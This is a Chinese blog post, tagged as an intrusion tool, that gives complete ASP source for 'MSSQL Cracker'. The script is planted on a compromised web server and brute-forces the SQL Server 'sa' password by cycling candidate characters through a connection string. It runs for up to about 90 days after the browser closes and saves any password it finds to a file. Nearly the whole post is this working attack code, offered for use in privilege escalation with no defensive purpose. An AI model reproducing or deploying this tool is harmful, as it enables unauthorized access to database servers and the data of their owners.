MSSQLCracker in ASP[asp提权]

一个暴力破解MSSQL用户密码的ASP程序,以下这个版本是可以运行之后关闭浏览器,运行完毕将在当前目录生成结果文件的。

<%
'============ ASP Port Scanner by lake2 ===================
'http://lake2.0x54.org
'Version: 0.1
'For SpringBoard
'==========================================================
%>
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
</style>
<title>MSSQL Cracker for SpringBoard</title>
<%
Dim Password()
If Request.Form("go") <> "1" Then
%>
 <div align="center">Welcome to <a href="
http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a> </div>
 <form name="form1" method="post" action="" onSubmit="form1.Submit.disabled=true;">
  ConnStr:
  <input name="conn" type="text" class="TextBox" id="conn" value="Provider=SQLOLEDB.1;Data Source=127.0.0.1;User ID=sa;Password={PASS};" size="70">
  <br>
  Char: &nbsp;&nbsp;&nbsp;&nbsp;
  <input name="char" type="text" class="TextBox" id="char" value="0123456789" size="30">
&nbsp;&nbsp;&nbsp;<br>
Length:&nbsp;&nbsp;
<input name="len" type="text" class="TextBox" id="len" value="3" size="4">
<br>
Path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<input name="path" type="text" class="TextBox" value="<%=Server.MapPath("r.txt")%>" size="50">
<input name="CFile" type="checkbox" class="TextBox" id="CFile" value="1" checked>
Enablel<br>
<input name="go" type="hidden" id="go" value="1">
<br>
<input name="Submit" type="submit" class="buttom" id="Submit" value=" Run ">
</form>
<%
Else
 timer1 = timer
 Server.ScriptTimeout = 7776000
 ConnStr = Request.Form("Conn")
 Char = request.Form("char")
 LenChar = Len(Char)
 ReDim password(LenChar)
 For i = 1 to LenChar
  password(i) = Mid(Char, i, 1)
 Next
 length = CInt(request.Form("len"))
 Call LAKE("")
 response.Write "Done!<br>Process " & tTime & " s"
 If request.Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime)
End If

Sub LAKE(str)
 If Len(str) >= length Then Exit Sub
 For j = 1 to LenChar
  pass = str & password(j)
  If Len(pass) = length Then Call Crack(pass)
  Call LAKE(pass)
 Next
End Sub

Sub Crack(str)
 On Error Resume Next
 Set conn = Server.CreateObject("ADODB.connection")
 conn.open Replace(ConnStr,"{PASS}",str)
 If Err Then
  If Err.Number <> -2147217843 Then
   response.Write(Err.Description & "<BR>")
   response.End()
  End If
 Else
  response.Write("I Get it ! Password is <font color=red>" & str & "</font><BR>Process " & tTime & " s")
  If request.Form("CFile") <> "" Then CreateResult(str & vbcrlf & tTime)
  response.End()
 End If
End Sub

Function tTime()
 timer2 = timer
 thetime=cstr(int(timer2-timer1))
 tTime = thetime
End Function

Sub CreateResult(t)
 Set fs = CreateObject("Scripting.FileSystemObject")
 Set outfile = fs.CreateTextFile(request.Form("path"))
 outfile.WriteLine t
 Set fs = Nothing
End Sub
%>


关键词: 工具 , 代码收藏 , 入侵

上一篇: 发俩图片
下一篇: 跨站脚本执行漏洞详解

相关文章
目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):